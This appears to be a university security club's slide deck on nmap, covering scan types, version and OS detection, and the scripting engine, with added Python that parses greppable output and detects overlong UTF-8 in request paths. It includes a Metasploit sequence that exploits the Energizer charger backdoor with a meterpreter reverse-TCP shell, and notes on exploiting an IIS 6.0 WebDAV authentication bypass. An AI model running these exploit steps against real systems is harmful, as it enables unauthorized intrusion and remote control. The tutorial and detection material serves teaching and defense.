4/13/2010: CSS meeting. Stephen Crane on programming contests, tomorrow @ 1pm, Building 8, Room 345...
CBARN! Buy your tickets today! $30. Great food! Learn more about other clubs and the College of Business. This Friday @ 7pm.
05/11/10
Idle scan (-sI): zombie scanning
- Scans a machine using another ("zombie") host
- As far as the scanned machine knows, our computer never communicated with it
- Only locates ports; no version info
- Doesn't spoof the MAC address
Advanced Features
- Version information (-sV)
  - Attempts to identify the version of the discovered service
  - Can make mistakes
- OS detection (-O)
  - More or less accurate
  - Can make mistakes
Advanced Features
- Verbosity (-v, -vv, -vvv)
  - Gives more info; very useful
  - grep is your friend
- Runtime interaction
  - v/V: adjust verbosity
  - Spacebar: print status message
- Scripting engine
  - Custom written scans
  - Vulnerability scanning & exploitation (kinda)
  - Written in Lua
- Two types: service scripts and host scripts
- Nine categories: Auth, Default, Discovery, External, Intrusive, Malware, Safe, Version, Vuln
Scripts location:
- /usr/share/nmap/scripts
- /usr/local/share/nmap/scripts
- C:\Program Files\Nmap\scripts
Update the script database: nmap --script-updatedb
Command format: nmap --script=<script_name> target
Energizer Trojan Script
- A backdoor was found in the Energizer charger program
- Might have been a mistake; we don't really care
- Listens on port 7777 of the infected machine
- Detection is now built in to the version scan: nmap -sV -p7777 target
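Version and OS detection produce a lot of text, and nmap's greppable output (-oG) is the form meant for grep. The Python below is an added example, not part of the slides: it parses constructed -oG lines into a per-host inventory of open ports with service, version and OS guess, and flags any host with TCP 7777 open as a candidate for the Energizer backdoor listener described above, to be confirmed with the nmap -sV -p7777 check from the slide. The port/state/protocol/owner/service/rpc_info/version field layout is nmap's greppable format; the hosts, hostnames, service names and version strings in the sample are constructed.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of greppable output (nmap -sV -O -oG -) for two
# hypothetical lab hosts; nothing here comes from a real scan.
SAMPLE_GNMAP = (
    "# Nmap scan initiated Tue May 11 2010 as: nmap -sV -O -oG - 192.168.56.0/24\n"
    "Host: 192.168.56.10 (lab-web)\tStatus: Up\n"
    "Host: 192.168.56.10 (lab-web)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1 Debian (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.2.14/, 443/closed/tcp//https///\t"
    "Ignored State: closed (997)\tOS: Linux 2.6.X\tSeq Index: 203\n"
    "Host: 192.168.56.20 (lab-pc)\tStatus: Up\n"
    "Host: 192.168.56.20 (lab-pc)\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "7777/open/tcp//cbt?///\tIgnored State: closed (998)\t"
    "OS: Microsoft Windows XP SP2 or SP3\tSeq Index: 36\n"
    "# Nmap done at Tue May 11 2010 -- 256 IP addresses (2 hosts up) scanned\n"
)


@dataclass
class PortInfo:
    port: int
    state: str
    proto: str
    service: str   # name from nmap-services or -sV ("?" suffix = unconfirmed guess)
    version: str   # product/version string from -sV, empty if none


@dataclass
class HostInfo:
    ip: str
    hostname: str
    os: str = ""                                  # filled from the "OS:" field (-O)
    ports: list = field(default_factory=list)


# One "Ports:" entry is port/state/protocol/owner/service/rpc_info/version/
PORT_RE = re.compile(r"^(\d+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$")
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")


def parse_gnmap(text):
    """Parse greppable nmap output into a list of HostInfo (one per IP)."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                # comment or blank line
        fields = line.split("\t")                   # -oG separates fields with tabs
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        host = hosts.setdefault(m.group(1), HostInfo(m.group(1), m.group(2)))
        for f in fields[1:]:
            key, _, value = f.partition(": ")
            if key == "Ports":
                for entry in value.split(", "):
                    pm = PORT_RE.match(entry.strip())
                    if pm:
                        host.ports.append(PortInfo(int(pm.group(1)), pm.group(2),
                                                   pm.group(3), pm.group(5), pm.group(7)))
            elif key == "OS":
                host.os = value
    return list(hosts.values())


def open_ports(host):
    return [p for p in host.ports if p.state == "open"]


def inventory_lines(hosts):
    """Grep-friendly summary: one 'ip port/proto service version [os]' line per open port."""
    lines = []
    for h in hosts:
        for p in sorted(open_ports(h), key=lambda p: p.port):
            lines.append(f"{h.ip} {p.port}/{p.proto} {p.service} {p.version} [{h.os}]".rstrip())
    return lines


ENERGIZER_PORT = 7777   # from the slide: the backdoor listens on TCP 7777


def flag_energizer_candidates(hosts):
    """Return (ip, service, version) for each host with TCP 7777 open.
    A listener on 7777 is only a candidate; confirm with nmap -sV -p7777 <ip>."""
    return [(h.ip, p.service, p.version)
            for h in hosts for p in open_ports(h)
            if p.port == ENERGIZER_PORT and p.proto == "tcp"]


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    for line in inventory_lines(found):
        print(line)
    for ip, service, version in flag_energizer_candidates(found):
        print(f"CHECK {ip}: TCP 7777 open ({service or 'unknown'} {version}); "
              f"confirm with nmap -sV -p7777 {ip}")
```

Real -oG output of a -sC or -A scan carries the same "Ports:" layout, so the same parser works there; the 7777 check is deliberately based on the port alone because the version match may or may not fire, which is exactly why the slide's -sV -p7777 follow-up exists.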
Energizer Trojan Script
- Metasploit! Metasploit has a module that will exploit the trojan
  > use exploit/windows/backdoor/energizer_duo_payload
  > set rhost target.ip
  > set payload windows/meterpreter/reverse_tcp
  > set lhost your.ip
  > exploit
IIS WebDAV script
- WebDAV allows users on a website to modify files on the webserver
- A vulnerability was found in the IIS 6.0 WebDAV implementation
- Allows remote authentication bypass due to a parsing error of Unicode characters
- Nmap has a script!
IIS WebDAV script
- The script can identify vulnerable files on the webserver
  nmap --script http-iis-webdav-vuln.nse target
IIS WebDAV script
- Let's exploit it manually
- The vulnerable server improperly parses the Unicode character '/' in its overlong UTF-8 form (0xc0 0xaf)
- We'll use telnet to exploit
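The overlong two-byte form 0xc0 0xaf that the slide names is the kind of input a defender can look for in request paths. The Python below is an added example, not from the slides: it decodes %XX escapes once and then walks the raw bytes looking for any overlong UTF-8 sequence (not only 0xc0 0xaf, but the general case of a code point encoded in more bytes than it needs), returning the offset and bytes of each hit over a constructed set of request paths. The methods and paths in the sample are invented for the example.

```python
import re

# Constructed sample of (method, raw path bytes) pairs, as a WAF or a
# log-analysis job might see them; not captured from a real server.
SAMPLE_REQUESTS = [
    (b"GET", b"/public/index.html"),
    (b"PROPFIND", b"/secure/"),
    (b"GET", b"/%c0%afsecure/report.doc"),   # percent-encoded 0xc0 0xaf
    (b"GET", b"/caf\xc3\xa9/menu.html"),     # valid two-byte UTF-8 (e-acute): must not be flagged
    (b"GET", b"/\xc0\xafsecure/"),           # raw overlong bytes
]


def percent_decode(raw: bytes) -> bytes:
    """Decode %XX escapes one time, leaving every other byte untouched (no charset decoding)."""
    return re.sub(rb"%([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)


def find_overlong_utf8(data: bytes):
    """Return [(offset, sequence_bytes)] for every overlong UTF-8 sequence in data.

    A well-formed 2-byte sequence must encode a code point >= 0x80, a 3-byte one
    >= 0x800 and a 4-byte one >= 0x10000.  Anything below that is "overlong":
    a strict decoder rejects it, while a lax decoder may turn 0xC0 0xAF into '/'.
    Invalid lead or continuation bytes are skipped; they are a different defect."""
    hits = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:                       # plain ASCII
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            length, min_cp = 2, 0x80
        elif 0xE0 <= b <= 0xEF:
            length, min_cp = 3, 0x800
        elif 0xF0 <= b <= 0xF7:
            length, min_cp = 4, 0x10000
        else:                              # stray continuation byte or 0xF8..0xFF
            i += 1
            continue
        seq = data[i:i + length]
        if len(seq) < length or any(not (0x80 <= c <= 0xBF) for c in seq[1:]):
            i += 1                         # truncated or malformed; not overlong
            continue
        cp = b & (0xFF >> (length + 1))    # payload bits of the lead byte
        for c in seq[1:]:
            cp = (cp << 6) | (c & 0x3F)    # six payload bits per continuation byte
        if cp < min_cp:
            hits.append((i, bytes(seq)))
        i += length
    return hits


def scan_requests(requests):
    """Flag each request whose path, after one round of %XX decoding, holds an overlong sequence."""
    findings = []
    for method, path in requests:
        hits = find_overlong_utf8(percent_decode(path))
        if hits:
            findings.append((method.decode("ascii"), path.decode("latin-1"), hits))
    return findings


if __name__ == "__main__":
    for method, path, hits in scan_requests(SAMPLE_REQUESTS):
        where = ", ".join(f"offset {off}: {seq.hex()}" for off, seq in hits)
        print(f"ALERT {method} {path!r}: overlong UTF-8 at {where}")
```

The same walk is what a validating decoder does internally; Python's own strict utf-8 codec raises on 0xc0 0xaf, so rejecting any path that does not strictly decode, before any path-based authorization decision is made, closes this class of parsing disagreement at the server, and the scanner above is for finding attempts in traffic or logs.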
Extra Stuff
- "default" script scan (-sC)
  - Scans using a bunch of different scripts
  - Very noisy, very intrusive
  - Gives you a lot of info
- "Aggressive" scan (-A)
  - Uses -O -sV -sC --traceroute
  - Again, very noisy, but lots and lots of info
Closing remarks
- nmap is a tool you should be familiar with
- There are many more techniques and scans that I did not cover
- Be mindful of who you are scanning (and any laws regarding scans)